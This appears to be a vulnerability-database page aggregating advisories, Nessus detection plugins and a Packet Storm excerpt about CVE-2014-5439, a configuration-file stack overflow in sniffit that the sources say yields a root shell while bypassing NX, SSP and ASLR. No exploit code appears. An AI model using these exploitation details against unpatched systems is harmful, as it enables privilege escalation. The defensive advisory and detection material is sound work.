Description
## Releases
* Ubuntu 16.04 ESM
## Packages
* sniffit - packet sniffer and monitoring tool
It was discovered that SniffIt incorrectly handled certain configuration
files. An attacker could possibly use this issue to execute arbitrary code.
Affected Package
Related
{"id": "USN-4652-1", "vendorId": null, "type": "ubuntu", "bulletinFamily": "unix", "title": "SniffIt vulnerability", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * sniffit \\- packet sniffer and monitoring tool\n\nIt was discovered that SniffIt incorrectly handled certain configuration \nfiles. An attacker could possibly use this issue to execute arbitrary code.\n", "published": "2020-11-30T00:00:00", "modified": "2020-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://ubuntu.com/security/notices/USN-4652-1", "reporter": "Ubuntu", "references": ["/security/CVE-2014-5439"], "cvelist": ["CVE-2014-5439"], "immutableFields": [], "lastseen": "2023-01-26T15:30:23", "viewCount": 38, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-5439"]}, {"type": "debian", "idList": ["DEBIAN:DLA-713-1:3CD42"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-5439"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-713.NASL", "UBUNTU_USN-4652-1.NASL"]}, {"type": "osv", 
"idList": ["OSV:DLA-713-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129292"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31415", "SECURITYVULNS:VULN:14114"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-5439"]}]}, "score": {"value": 2.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-5439"]}, {"type": "debian", "idList": ["DEBIAN:DLA-713-1:3CD42"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-5439"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/UBUNTU-CVE-2014-5439/"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-713.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129292"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14114"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-5439"]}]}, "exploitation": null, "vulnersScore": 2.4}, "_state": {"dependencies": 1674747202, "score": 1674747447}, "_internal": {"score_hash": "e572c9c2f29255a07538d418eb90f132"}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "0.3.7.beta-19ubuntu0.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "sniffit"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "0.3.7.beta-19ubuntu0.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "sniffit-dbgsym"}]}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:58", "description": "Buffer overflow in configuration file.", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-12-01T00:00:00", "type": "securityvulns", "title": "sniffit buffer overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14114", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:55", "description": "\r\nCVE-2014-5439 - Root shell on Sniffit\r\n\r\nSniffit is a packet sniffer and monitoring tool.\r\n\r\nThe attacker can create a specially-crafted sniffit configuration file, which is able\r\nto bypass all three protection mechanisms:\r\n\r\n - Non-eXecutable bit NX\r\n - Stack Smashing Protector SSP\r\n - Address Space Layout Randomisation ASLR\r\n\r\nAnd execute arbitrary code with root privileges.\r\n\r\nExploit, fix and discussion 
in:\r\n\r\nhttp://hmarco.org/bugs/CVE-2014-5439-sniffit_0.3.7-stack-buffer-overflow.html\r\n\r\n\r\nRegards,\r\nHector Marco.\r\nhttp://hmarco.org\r\n\r\nCybersecurity researcher at:\r\nhttp://cybersecurity.upv.es/\r\n\r\n\r\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-12-01T00:00:00", "type": "securityvulns", "title": "CVE-2014-5439 - Root shell on Sniffit [with exploit]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31415", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31415", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-08-19T12:10:49", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-4652-1 advisory.\n\n - Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space layout randomization ASLR protection 
mechanisms, which could let a malicious user execute arbitrary code.\n (CVE-2014-5439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-01T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : SniffIt vulnerability (USN-4652-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5439"], "modified": "2020-12-03T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:sniffit"], "id": "UBUNTU_USN-4652-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143375", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4652-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143375);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/03\");\n\n script_cve_id(\"CVE-2014-5439\");\n script_bugtraq_id(71318);\n script_xref(name:\"USN\", value:\"4652-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : SniffIt vulnerability (USN-4652-1)\");\n script_summary(english:\"Checks the dpkg output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the\nUSN-4652-1 advisory.\n\n - Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted\n configuration file that will bypass Non-eXecutable bit NX, stack smashing 
protector SSP, and address space\n layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.\n (CVE-2014-5439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4652-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sniffit package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-5439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sniffit\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'sniffit', 'pkgver': '0.3.7.beta-19ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sniffit');\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:38:53", "description": "It was discovered that there was a buffer overflow in the packet sniffer and monitoring tool 'sniffit' which allowed a specially crafted configuration file to provide a 
root shell.\n\nFor Debian 7 'Wheezy', this issue has been fixed in sniffit version 0.3.7.beta-16.1+deb7u1.\n\nWe recommend that you upgrade your sniffit packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-22T00:00:00", "type": "nessus", "title": "Debian DLA-713-1 : sniffit security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5439"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:sniffit", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-713.NASL", "href": "https://www.tenable.com/plugins/nessus/95029", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-713-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95029);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5439\");\n script_bugtraq_id(71318);\n\n script_name(english:\"Debian DLA-713-1 : sniffit security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that there was a buffer overflow in the packet\nsniffer and monitoring tool 'sniffit' which allowed a\nspecially crafted configuration file to provide a root shell.\n\nFor Debian 7 'Wheezy', this issue has been fixed in sniffit version\n0.3.7.beta-16.1+deb7u1.\n\nWe recommend that you upgrade your sniffit packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/11/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/sniffit\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected sniffit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sniffit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"sniffit\", reference:\"0.3.7.beta-16.1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:44:43", "description": "Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-19T16:15:00", "type": "cve", "title": "CVE-2014-5439", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2020-08-18T15:05:00", "cpe": ["cpe:/a:sniffit_project:sniffit:0.3.7", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2014-5439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5439", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sniffit_project:sniffit:0.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2022-11-24T06:07:04", "description": "Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-19T16:15:00", "type": "debiancve", "title": "CVE-2014-5439", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2019-11-19T16:15:00", "id": "DEBIANCVE:CVE-2014-5439", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5439", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:12:42", "description": "\nIt was discovered that there was a buffer overflow in the packet sniffer and\nmonitoring tool sniffit which allowed a specially-crafted configuration file\nto provide a root shell.\n\n\nFor Debian 7 Wheezy, this issue has been fixed in sniffit version\n0.3.7.beta-16.1+deb7u1.\n\n\nWe recommend that you upgrade your sniffit packages.\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-21T00:00:00", "type": "osv", "title": "sniffit - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2022-07-21T05:54:44", "id": "OSV:DLA-713-1", "href": "https://osv.dev/vulnerability/DLA-713-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-23T21:46:34", "description": "Package : sniffit\nVersion : 0.3.7.beta-16.1+deb7u1\nCVE ID : CVE-2014-5439\nDebian Bug : 845122\n\nIt was discovered that there was a buffer overflow in the packet sniffer and\nmonitoring tool "sniffit" which allowed a specially-crafted configuration file\nto provide a root shell.\n\nFor Debian 7 "Wheezy", this issue has been fixed in sniffit version\n0.3.7.beta-16.1+deb7u1.\n\nWe recommend that you upgrade your sniffit packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. `'` lamby@debian.org / chris-lamb.co.uk\n `-", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-11-21T08:47:40", "type": "debian", "title": "[SECURITY] [DLA 713-1] sniffit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": 
"2016-11-21T08:47:40", "id": "DEBIAN:DLA-713-1:3CD42", "href": "https://lists.debian.org/debian-lts-announce/2016/11/msg00020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-01-26T14:17:18", "description": "Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit\nprior to 0.3.7 via a crafted configuration file that will bypass\nNon-eXecutable bit NX, stack smashing protector SSP, and address space\nlayout randomization ASLR protection mechanisms, which could let a\nmalicious user execute arbitrary code.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | sniffit is not setuid, so this issue only affects configurations where a user is only permitted to run a subset of administrative (e.g. using a sudo configuration that only allows a user to run sniffit).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-19T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5439", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2019-11-19T00:00:00", "id": 
"UB:CVE-2014-5439", "href": "https://ubuntu.com/security/CVE-2014-5439", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:02", "description": "", "cvss3": {}, "published": "2014-11-27T00:00:00", "type": "packetstorm", "title": "Sniffit Root Shell", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-5439"], "modified": "2014-11-27T00:00:00", "id": "PACKETSTORM:129292", "href": "https://packetstormsecurity.com/files/129292/Sniffit-Root-Shell.html", "sourceData": "`CVE-2014-5439 - Root shell on Sniffit \nAuthors: Ismael Ripoll & Hector Marco \nCVE: CVE-2014-5439 \nDates: July 2014 - Discovered the vulnerability \n \nDescription \n \nSniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string() which causes a stack buffer overflow when parsing a configuration file with \"long\" paths (more than 20 characters). \n \nThe attacker can to create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms: \n \nNon-eXecutable bit NX \nStack Smashing Protector SSP \nAddress Space Layout Randomisation ASLR \n \nAnd execute arbitrary code with root privileges (the id of the user that launches the sniffit). \n \nThe new issue has been assigned CVE-2014-7169. \n \nThe presented PoC successfully exploits the vulnerability. \n \n \nImpact \n \nTo use the sniffit, the application need to be executed with root privileges. Typically by sudo or pkexec or setting the UID bit. Since this tool requires this privilege to execute the sniffer, only allowing to a user execute the sniffer is enough to execute commands as root. \n \n \n \nVulnerable packages \n \nThe sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository installable via apt-get install sniffit. 
